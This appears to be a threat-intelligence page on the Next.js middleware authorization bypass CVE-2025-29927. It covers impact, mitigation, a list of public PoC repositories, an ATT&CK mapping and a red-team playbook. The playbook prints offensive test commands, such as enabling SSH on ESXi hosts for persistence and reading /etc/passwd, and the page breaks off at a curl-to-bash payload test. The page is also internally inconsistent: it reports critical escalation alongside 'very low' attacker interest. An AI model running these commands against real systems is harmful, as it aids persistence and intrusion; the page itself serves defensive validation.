CVE-2025-29927

CRITICAL EXPLOIT POC TTE 9h Pub 21/03 Upd 08/04

Overview

This vulnerability is an authorization bypass affecting the middleware component of the Next.js React framework. The root cause lies in the improper handling of requests containing the x-middleware-subrequest header, which allows bypassing authorization checks implemented in middleware. The flaw exists in versions starting from 1.11.4 up to but not including 12.3.5, 13.5.9, 14.2.25, and 15.2.3, impacting the request validation logic within Next.js middleware.

Vulnerability Description

Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.

Impact

An unauthenticated attacker can exploit this vulnerability remotely by sending crafted HTTP requests containing the x-middleware-subrequest header to bypass authorization checks in Next.js middleware. This unauthorized access can lead to exposure of protected resources or functionality within the application without valid credentials. The attack requires network access but no user interaction or authentication, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N). This can result in unauthorized data access or privilege escalation within affected Next.js applications.

Solution

Upgrade Next.js to one of the patched versions: 12.3.5, 13.5.9, 14.2.25, or 15.2.3 as detailed in the official GitHub security advisory (https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw). If immediate upgrading is not feasible, implement a network-level mitigation to block external requests containing the x-middleware-subrequest header from reaching the Next.js application. Refer to the vendor advisory and commit history for precise patch application instructions.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability in the Next.js framework arises from improper handling of authorization checks within middleware components. Specifically, when these checks are not adequately enforced, an attacker can exploit this weakness to bypass security measures that are intended to restrict access to sensitive resources. The flaw is particularly concerning because it affects multiple versions of the framework, allowing unauthorized users to potentially gain access to functionalities or data that should be protected. This issue is exacerbated by the framework's reliance on middleware for critical authorization processes, which, if misconfigured or inadequately implemented, can lead to significant security lapses.

Exploitation of this vulnerability can occur through various attack vectors. An attacker might craft a malicious request that includes the x-middleware-subrequest header, which is typically used for internal subrequests within the application. By manipulating this header, the attacker can trick the application into bypassing the intended authorization checks, thereby gaining unauthorized access to restricted areas of the application. This could lead to unauthorized data exposure, modification of application state, or even complete control over the application, depending on the privileges associated with the compromised session. The simplicity of this attack vector makes it particularly dangerous, as it does not require advanced technical skills, thus broadening the potential pool of attackers.

The real-world impact of this vulnerability can be severe, particularly for organizations that rely on Next.js for their web applications. Unauthorized access to sensitive data can lead to data breaches, which not only compromise user privacy but also result in significant financial and reputational damage. Businesses may face regulatory fines, loss of customer trust, and potential legal repercussions as a result of such breaches. Furthermore, the exploitation of this vulnerability could enable attackers to deploy malicious code or conduct further attacks within the compromised environment, leading to a cascading effect of security incidents. The high CVSS score of 9.1 underscores the critical nature of this vulnerability and the urgency for affected organizations to address it.

To detect and mitigate this vulnerability, organizations should prioritize upgrading to the patched versions of Next.js as soon as feasible. Regularly updating software components is a fundamental practice in maintaining security hygiene. In scenarios where immediate patching is not possible, it is advisable to implement network-level controls that block requests containing the x-middleware-subrequest header from reaching the application. This can be achieved through web application firewalls (WAFs) or other network security measures that inspect incoming traffic for malicious patterns. Additionally, conducting thorough security audits and code reviews can help identify and rectify any misconfigurations or weaknesses in the authorization logic within middleware components.

In conclusion, the vulnerability in the Next.js framework presents a significant threat to web applications built using this technology. Its potential for exploitation through simple attack vectors, combined with the severe implications of unauthorized access, necessitates immediate attention from organizations utilizing this framework. By adopting proactive detection and mitigation strategies, businesses can safeguard their applications against this and similar vulnerabilities, thereby enhancing their overall security posture and protecting sensitive data from malicious actors.




CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the Next.js authorization bypass vulnerability. Our telemetry indicates a significant surge in attack activity, accompanied by the emergence of several new proof-of-concept exploits and detection tools circulating within the threat landscape. Although the EPSS score shows a slight decline, this metric does not fully capture the increased adversary interest and operational activity observed. The proliferation of publicly available exploit code lowers the barrier to entry for threat actors, potentially broadening the pool of attackers capable of leveraging this vulnerability. This development elevates the overall threat level, underscoring the urgency for defenders to monitor for exploitation attempts closely and reassess their detection capabilities. The expanding exploit ecosystem and intensified attack volume collectively signal an increased risk to organizations running vulnerable Next.js versions, necessitating heightened vigilance despite the marginal EPSS decrease.



Update 2 — May 23, 2026

CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2025-29927, accompanied by the emergence of additional proof-of-concept tools that have diversified the attack methodologies observed in the wild. Our telemetry indicates that threat actors are increasingly leveraging these publicly available exploits to bypass authorization controls within Next.js middleware, amplifying the potential impact on vulnerable environments. The slight uptick in the Exploit Prediction Scoring System (EPSS) score corroborates this trend, reflecting a modest but steady increase in the likelihood of exploitation. This evolving exploit landscape signifies a broadening of the attacker base, including less sophisticated actors who can now deploy these tools with minimal customization. Consequently, the threat level has escalated from elevated to critical, underscoring the urgency for defenders to intensify monitoring and detection efforts. The sustained growth in exploitation activity and tool availability heightens the risk of successful breaches, particularly in organizations that have yet to implement the recommended patches or mitigations.



Update 3 — July 04, 2026

CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2025-29927, accompanied by the emergence of additional publicly available proof-of-concept exploits and enhanced scanning modules. Our telemetry indicates that adversaries are increasingly leveraging automated tools that exploit the x-middleware-subrequest header vulnerability, broadening the attacker base to include less technically skilled actors. This expansion in exploit accessibility significantly raises the probability of opportunistic attacks against vulnerable Next.js deployments that have not yet applied the necessary patches or mitigations. While the overall EPSS score remains near maximum, the upward trend in exploitation activity underscores a growing urgency for defenders to prioritize detection and monitoring efforts. Consequently, the threat level associated with this vulnerability has intensified, reflecting a higher risk of unauthorized access and potential data compromise within affected environments.

Affected Products (4)

Vendor Product Version CPE
vercel Vercel Next.js All cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
vercel Vercel Next.js All cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
vercel Vercel Next.js All cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
vercel Vercel Next.js All cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

Metasploit (1)

Module Authors Rank Platform Link
Next.js Middleware Authorization Bypass Scanner
auxiliary/scanner/http/nextjs_middleware_auth_bypass
Rachid Allam, Yasser Allam, Kenneth LaCroix Unknown - View

ExploitDB (1)

Title Author Type Platform Date Link
Next.js Middleware 15.2.2 - Authorization Bypass kOaDT webapps multiple - View

GitHub PoCs (123)

Repository Author Stars Forks Date Link
aydinnyunus/CVE-2025-29927
CVE-2025-29927 Proof of Concept
aydinnyunus 99 28 2025-03-23 View
AnonKryptiQuz/NextSploit
NextSploit is a command-line tool designed to detect and exploit CVE-2025-29927, a security flaw in Next.js
AnonKryptiQuz 91 19 2025-03-28 View
websecnl/CVE-2025-29927-PoC-Exploit
Proof-of-Concept for Authorization Bypass in Next.js Middleware
websecnl 20 4 2025-03-23 View
lirantal/vulnerable-nextjs-14-CVE-2025-29927
lirantal 14 8 2025-03-23 View
6mile/nextjs-CVE-2025-29927
A Nuclei template to detect CVE-2025-29927 the Next.js authentication bypass vulnerability
6mile 19 3 2025-03-23 View
azu/nextjs-cve-2025-29927-poc
Next.js PoC for CVE-2025-29927
azu 15 0 2025-03-23 View
UNICORDev/exploit-CVE-2025-29927
Exploit for CVE-2025-29927 (Next.js) - Authorization Bypass
UNICORDev 11 2 2025-04-14 View
strobes-security/nextjs-vulnerable-app
CVE-2025-29927 lab
strobes-security 6 7 2025-03-24 View
MuhammadWaseem29/CVE-2025-29927-POC
Authorization Bypass in Next.js Middleware
MuhammadWaseem29 9 3 2025-03-23 View
kOaDT/poc-cve-2025-29927
This repository contains a proof of concept (POC) and an exploit script for CVE-2025-29927, a critical vulnerability in ...
kOaDT 7 3 2025-03-26 View
phoscoder/ghost-route
Ghost Route detects if a Next JS site is vulnerable to the corrupt middleware bypass bug (CVE-2025-29927)
phoscoder 9 0 2025-03-25 View
gotr00t0day/CVE-2025-29927
Next.js Middleware Bypass Scanne
gotr00t0day 8 1 2025-04-06 View
0rd1na1/CVE-2025-29927-Research
CVE-2025-29927에 대한 설명 및 리서치
0rd1na1 7 0 2025-03-27 View
KaztoRay/CVE-2025-29927-Research
CVE-2025-29927에 대한 설명 및 리서치
KaztoRay 7 0 2025-03-27 View
fourcube/nextjs-middleware-bypass-demo
Demo for Next.js middleware bypass - CVE-2025-29927
fourcube 5 0 2025-03-24 View
alihussainzada/CVE-2025-29927-PoC
PoC for CVE-2025-29927: Next.js Middleware Bypass Vulnerability. Demonstrates how x-middleware-subrequest can bypass aut...
alihussainzada 5 0 2025-03-25 View
RoyCampos/CVE-2025-29927
CVE-2025-29927 Exploit Checker
RoyCampos 4 1 2025-03-24 View
0xWhoknows/CVE-2025-29927
Async Python scanner for Next.js CVE-2025-29927. Uses aiohttp & aiofiles to efficiently process large URL lists, detect ...
0xWhoknows 3 2 2025-03-24 View
luq0x/0xMiddleware
CVE-2025-29927: Next.js Middleware Exploit
luq0x 3 2 2025-03-28 View
HoumanPashaei/CVE-2025-29927
This is a CVE-2025-29927 Scanner.
HoumanPashaei 5 0 2025-04-29 View
Ademking/CVE-2025-29927
Next.js Middleware Authorization Bypass
Ademking 4 1 2025-03-22 View
t3tra-dev/cve-2025-29927-demo
Next.js における認可バイパスの脆弱性 CVE-2025-29927 を再現するデモです。
t3tra-dev 4 0 2025-03-23 View
TheresAFewConors/CVE-2025-29927-Testing
PowerShell script to test if a web app is vulnerable to CVE-2025-29927
TheresAFewConors 2 2 2025-03-25 View
Eve-SatOrU/POC-CVE-2025-29927
CVE-2025-29927 Proof of Concept
Eve-SatOrU 3 1 2025-03-24 View
c0dejump/CVE-2025-29927-check
script to check cve "CVE-2025-29927" while waiting to add it to HExHTTP
c0dejump 3 1 2025-03-25 View
dedibagus/cve-2025-29927-poc
Authorization Bypass in Next.js Middleware
dedibagus 0 3 2025-04-01 View
EQSTLab/CVE-2025-29927
Next.js middleware bypass exploit
EQSTLab 2 0 2025-04-25 View
yugo-eliatrope/test-cve-2025-29927
yugo-eliatrope 1 1 2025-03-26 View
nicknisi/next-attack
A demo of the CVE-2025-29927 vulnerability for a NebraskaJS lightning talk
nicknisi 2 0 2025-03-26 View
lstudlo/nextjs-cve-demo
演示 Next.js 中的 Middleware 授權繞過漏洞 (CVE-2025-29927) 允許未經授權的用戶存取受保護的資訊。
lstudlo 2 0 2025-05-15 View
sermikr0/nextjs-middleware-auth-bypass
CVE-2025-29927
sermikr0 1 1 2025-09-23 View
liamromanis101/CVE-2025-29927-NextJS
PoC for testing CVE-2025-29927 for Next.js versions 11.x, 12.x <= 12.3.5, 13.x <= 13.5.9, 14.x <=14.2.25, 15.x <= 15.2.3
liamromanis101 1 1 2025-12-02 View
arvion-agent/next-CVE-2025-29927
CVE-2025-29927 Authorization Bypass in Next.js Middleware
arvion-agent 2 0 2025-03-24 View
Nekicj/CVE-2025-29927-exploit
next.js CVE-2025-29927 vulnerability exploit
Nekicj 2 0 2025-03-27 View
emadshanab/CVE-2025-29927
New nuclei CVE
emadshanab 2 0 2025-03-26 View
Oyst3r1ng/CVE-2025-29927
Next.js Middleware Auth Bypass
Oyst3r1ng 2 0 2025-03-24 View
lem0n817/CVE-2025-29927
Next.js 中间件授权绕过漏洞测试环境 (CVE-2025-29927)
lem0n817 2 0 2025-03-24 View
nocomp/CVE-2025-29927-scanner
python script for evaluate if you are vulnerable or not to next.js CVE-2025-29927
nocomp 1 1 2025-03-27 View
kh4sh3i/CVE-2025-29927
CVE-2025-29927: Next.js Middleware Bypass Vulnerability
kh4sh3i 2 0 2025-04-23 View
ferpalma21/Automated-Next.js-Security-Scanner-for-CVE-2025-29927
This script scans a list of URLs to detect if they are using **Next.js** and determines whether they are vulnerable to *...
ferpalma21 2 0 2025-03-29 View
pouriam23/Next.js-Middleware-Bypass-CVE-2025-29927-
pouriam23 2 0 2025-04-21 View
mhamzakhattak/CVE-2025-29927
mhamzakhattak 1 0 2025-04-16 View
0xcucumbersalad/cve-2025-29927
0xcucumbersalad 0 1 2025-03-25 View
kuzushiki/CVE-2025-29927-test
CVE-2025-29927の検証
kuzushiki 1 0 2025-03-24 View
ricsirigu/CVE-2025-29927
A deliberately Next.js app, vulnerable to CVE-2025-29927, Authorization Bypass
ricsirigu 1 0 2025-03-24 View
jmbowes/NextSecureScan
Next.js CVE-2025-29927 Vulnerability Scanner
jmbowes 1 0 2025-03-27 View
m2hcz/PoC-for-Next.js-Middleware
> 🔓 Proof-of-Concept for a fictional Next.js middleware bypass (CVE-2025-29927) — craft sub-requests to test protected r...
m2hcz 1 0 2025-03-27 View
alastair66/CVE-2025-29927
Next.js Middleware Bypass Vulnerability
alastair66 1 0 2025-04-01 View
rubbxalc/CVE-2025-29927
rubbxalc 1 0 2025-04-29 View
olimpiofreitas/CVE-2025-29927-scanner
olimpiofreitas 1 0 2025-05-03 View
kazuya256/next-js-auth-bypass
🔓 Next.js Auth Bypass Demo - Educational application demonstrating CVE-2025-29927 middleware authentication bypass vulne...
kazuya256 1 0 2025-07-06 View
iteride/CVE-2025-29927
iteride 1 0 2025-09-21 View
Bongni/CVE-2025-29927
Reproduction and fix of the CVE-2025-29927 vulnerability.
Bongni 1 0 2025-10-08 View
jeymo092/cve-2025-29927
jeymo092 0 1 2025-03-25 View
aleongx/CVE-2025-29927_Scanner
Este script verifica la vulnerabilidad CVE-2025-29927 en servidores Next.js, probando múltiples cargas en la cabecera x-...
aleongx 0 1 2025-03-27 View
SugiB3o/vulnerable-nextjs-14-CVE-2025-29927
vulnerable-nextjs-14-CVE-2025-29927
SugiB3o 0 1 2025-05-29 View
w2hcorp/CVE-2025-29927-PoC
Here is a simple but effective exploit for CVE-2025-29927.
w2hcorp 1 0 2025-03-29 View
Kamal-418/Vulnerable-Lab-NextJS-CVE-2025-29927
Kamal-418 1 0 2025-03-30 View
DanielHallbro/CVE-2025-29927-Nextjs-Bypass-PoC
A Proof of Concept for CVE-2025-29927 demonstrating a middleware bypass in Next.js versions prior to 13.5.9
DanielHallbro 1 0 2026-01-26 View
pixilated730/NextJS-Exploit-
CVE-2025-29927
pixilated730 1 0 2025-04-07 View
0xnxt1me/CVE-2025-29927
0xnxt1me 1 0 2025-04-08 View
hujiaozhuzhu/CVE-2025-29927__Next.js
CVE-2025-29927 - Next.js漏洞测试工具
hujiaozhuzhu 0 1 2026-04-02 View
moften/CVE-2025-29927_Next.js_Auth_Bypass
Next.js Auth Bypass PoC Edge Runtime Env Leak via Middleware Bug
moften 1 0 2025-05-06 View
surajpandeyp/CVE-2025-29927
surajpandeyp 0 0 2026-07-07 View
Fomovet/cve-2025-29927
POC for CVE-2025-29927
Fomovet 0 0 2026-06-21 View
SwapnilDeshpande/cve-2025-29927-lab
Reproduction lab for CVE-2025-29927 — Next.js middleware authorization bypass (CVSS 9.1)
SwapnilDeshpande 0 0 2026-06-10 View
gitgudKrish/cve-2025-29927-nextjs
gitgudKrish 0 0 2026-05-20 View
bk-security/auth-header-trust-rules
Semgrep rules that flag header-trust auth bypass patterns (CVE-2025-29927 class). Companion to bk-security.github.io.
bk-security 0 0 2026-05-12 View
s11s11/CVE-2025-29927
Demo of CVE-2025-29927 for secure programming class
s11s11 0 0 2025-08-17 View
Nayekah/Next.js-Proof-of-Concept
Some Proof-of-Concept (POCs) for CVE-2025-29927, CVE-2026-27978, and CVE-2026-29057 in Next.js.
Nayekah 0 0 2026-04-25 View
TheWaterbug/alpr-dashboard-patches
Runtime patches for algertc/alpr-dashboard: async logger fix and CVE-2025-29927 nginx mitigation
TheWaterbug 0 0 2026-04-24 View
shahin-shadow/nextjs-auth-bypass
Analysis and exploitation of a Next.js authorization bypass vulnerability (CVE-2025-29927)
shahin-shadow 0 0 2026-04-04 View
kuyrathdaro/cve-2025-29927
kuyrathdaro 0 0 2025-09-28 View
Si-Ni/CVE-2025-29927-Proof-of-Concept
Capture the Flag challenge: CVE-2025-29927 in combination with a command injection vulnerability
Si-Ni 0 0 2026-02-01 View
Balajih4kr/cve-2025-29927
CVE-2025-29927 is a critical vulnerability in Next.js, a popular React-based web framework. The flaw exists in how the m...
Balajih4kr 0 0 2025-04-05 View
sdrtba/CVE-2025-29927
sdrtba 0 0 2025-09-20 View
maronnjapan/claude-create-CVE-2025-29927
maronnjapan 0 0 2025-03-25 View
adjscent/vulnerable-nextjs-14-CVE-2025-29927
do not use. vulnerable
adjscent 0 0 2025-09-17 View
pickovven/vulnerable-nextjs-14-CVE-2025-29927
pickovven 0 0 2025-04-08 View
R3verseIN/Nextjs-middleware-vulnerable-appdemo-CVE-2025-29927
R3verseIN 0 0 2025-08-19 View
JOOJIII/CVE-2025-29927
JOOJIII 0 0 2025-04-01 View
furmak331/CVE-2025-29927
Critical vulnerability in next.js : Bypass middleware authentication
furmak331 0 0 2025-03-25 View
aleongx/CVE-2025-29927
Next.js Acceso no autorizado CVE-2025-29927
aleongx 0 0 2025-03-26 View
Heimd411/CVE-2025-29927-PoC
Heimd411 0 0 2025-03-27 View
dante01yoon/CVE-2025-29927
Next.js CVE-2025-29927 demonstration
dante01yoon 0 0 2025-03-29 View
0xb1lal/CVE-2025-29927
Next.js CVE-2025-29927 güvenlik açığı hakkında
0xb1lal 0 0 2025-04-01 View
Gokul-Krishnan-V-R/cve-2025-29927
Next.js and the corrupt middleware...TRY TO HACK IT..!
Gokul-Krishnan-V-R 0 0 2025-04-02 View
sn1p3rt3s7/NextJS_CVE-2025-29927
sn1p3rt3s7 0 0 2025-04-04 View
Grand-Moomin/Vuln-Next.js-CVE-2025-29927
Grand-Moomin 0 0 2025-04-18 View
EarthAngel666/x-middleware-exploit
x-middleware exploit for next.js CVE-2023–46298 cache poisoning and CVE-2025-29927 bypass
EarthAngel666 0 0 2025-05-08 View
sagsooz/CVE-2025-29927
🔐 Python-based smart scanner for CVE-2025-29927 — Next.js middleware authentication bypass vulnerability. Detects meta r...
sagsooz 0 0 2025-05-26 View
amitlttwo/Next.JS-CVE-2025-29927
amitlttwo 0 0 2025-06-12 View
mickhacking/Thank-u-Next
CVE-2025-29927 PoC | Auth Bypass Exploit | Python Tool using httpx | Middleware Vulnerability | Ethical Hacking Toolkit
mickhacking 0 0 2025-07-14 View
rgvillanueva28/vulnbox-easy-CVE-2025-29927
rgvillanueva28 0 0 2025-07-30 View
MKIRAHMET/CVE-2025-29927-PoC
This repository contains **research and analysis** related to CVE-2025-29927. It demonstrates safe, controlled testing...
MKIRAHMET 0 0 2025-09-11 View
amalpvatayam67/day10-nextjs-middleware-lab
Next.js middleware auth-bypass lab (CVE-2025-29927 simulation)
amalpvatayam67 0 0 2025-09-23 View
dbwlsdnr95/CVE-2025-29927
dbwlsdnr95 0 0 2026-03-02 View
ticofookfook/poc-nextjs-CVE-2025-29927
ticofookfook 0 0 2025-03-23 View
w3shinew/CVE-2025-29927
A touch of security
w3shinew 0 0 2025-03-26 View
enochgitgamefied/NextJS-CVE-2025-29927
enochgitgamefied 0 0 2025-04-16 View
Hirainsingadia/CVE-2025-29927
Next js middlewareauth Bypass
Hirainsingadia 0 0 2025-04-28 View
yuzu-juice/CVE-2025-29927_demo
This repository is for educational and research purposes.
yuzu-juice 0 0 2025-03-28 View
enochgitgamefied/NextJS-CVE-2025-29927-Docker-Lab
enochgitgamefied 0 0 2025-05-23 View
sangrok-jeon/CVE-2025-29927-Nextjs-Analysis
CVE-2025-29927-Nextjs 분석 보고서
sangrok-jeon 0 0 2026-03-17 View
Toddkk02/CVE-2025-29927
Toddkk02 0 0 2026-03-17 View
0xPb1/Next.js-CVE-2025-29927
0xPb1 0 0 2025-03-25 View
fahimalshihab/NextBypass
Next.js Middleware Authorization Bypass Tool (CVE-2025-29927)
fahimalshihab 0 0 2025-04-03 View
serhalp/test-cve-2025-29927
Verify Next.js CVE-2025-29927 on Netlify not vulnerable
serhalp 0 0 2025-03-22 View
YEONDG/nextjs-cve-2025-29927
vulnerable-nextjs-14-CVE-2025-29927
YEONDG 0 0 2025-04-06 View
ValGrace/middleware-auth-bypass
CVE-2025-29927 ~ a poc of the next.js middleware authentication bypass
ValGrace 0 0 2025-04-08 View
sahbaazansari/CVE-2025-29927
The POC for m6.fr website
sahbaazansari 0 0 2025-07-27 View
iSee857/CVE-2025-29927
Next.Js 权限绕过漏洞(CVE-2025-29927)
iSee857 0 0 2025-03-24 View
elshaheedy/CVE-2025-29927-Sigma-Rule
Sigma Rule for CVE-2025–29927 Detection
elshaheedy 0 0 2025-03-24 View
ayato-shitomi/WebLab_CVE-2025-29927
Next.js Auth Bypass Lab ‐ CVE-2025-29927
ayato-shitomi 0 0 2025-03-30 View
darklotuskdb/nextjs-CVE-2025-29927-hunter
Next.js CVE-2025-29927 Hunter
darklotuskdb 0 0 2025-04-11 View
ethanol1310/POC-CVE-2025-29927-
POC CVE-2025-29927
ethanol1310 0 0 2025-04-13 View
b4sh0xf/PoC-CVE-2025-29927
→ poc for CVE-2025-29927
b4sh0xf 0 0 2025-07-29 View
metasploit403/cve-2025-29927-lab
Deliberately vulnerable Next.js application demonstrating CVE-2025-29927 (middleware-based auth bypass) for learning and...
metasploit403 0 0 2026-04-02 View
0xPThree/next.js_cve-2025-29927
0xPThree 0 0 2025-03-25 View
Naveen-005/Next.Js-middleware-bypass-vulnerability-CVE-2025-29927
A basic proof of concept of the CVE-2025-29927 vulnerability that allows to bypass the middleware scripts.
Naveen-005 0 0 2025-04-02 View
l1uk/nextjs-middleware-exploit
Research on Next.js middleware vulnerability (CVE-2025-29927) allowing authorization bypass and potential exploits.
l1uk 0 0 2025-04-09 View
Knotsecurity/CVE-2025-29927-NextJs-Middleware-Simulation
Simulates CVE-2025-29927, a critical Next.js vulnerability allowing attackers to bypass middleware authorization by expl...
Knotsecurity 0 0 2025-04-16 View
zs1n/CVE-2025-29927
PoC | NextJS Middleware 15.2.2 - Authorization Bypass
zs1n 0 0 2025-08-28 View
Exploited in Wild NOT DETECTED
Ransomware NOT ASSOCIATED
Attacker Interest VERY LOW
Sightings Few sightings

Threat Feed

26 events
2026-07-10
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-09
Threat Sensor Sighting — Some sightings

Sighting activity recorded

2026-07-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-24
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-10
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-11
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-24
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2025-03-22
PoC Published (123 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2025-03-21
Exploit Published (1 ExploitDB, 1 Metasploit)

Public exploit code is available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Authorization Bypass
100% authz_bypass
Insecure Direct Object Reference
71% idor
Privilege Escalation
35% privilege_escalation

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1505.003 Web Shell Kill Chain persistence Linux, macOS, Network Devices, Windows
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-1 Accessing Functionality Not Properly Constrained by ACLs
32%
High High
CAPEC-647 Collect Data from Registries
30%
Medium Medium
CAPEC-59 Session Credential Falsification through Prediction
30%
High High
CAPEC-77 Manipulating User-Controlled Variables
30%
High Very High
CAPEC-17 Using Malicious Files
30%
High Very High

Red Team Playbook

44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
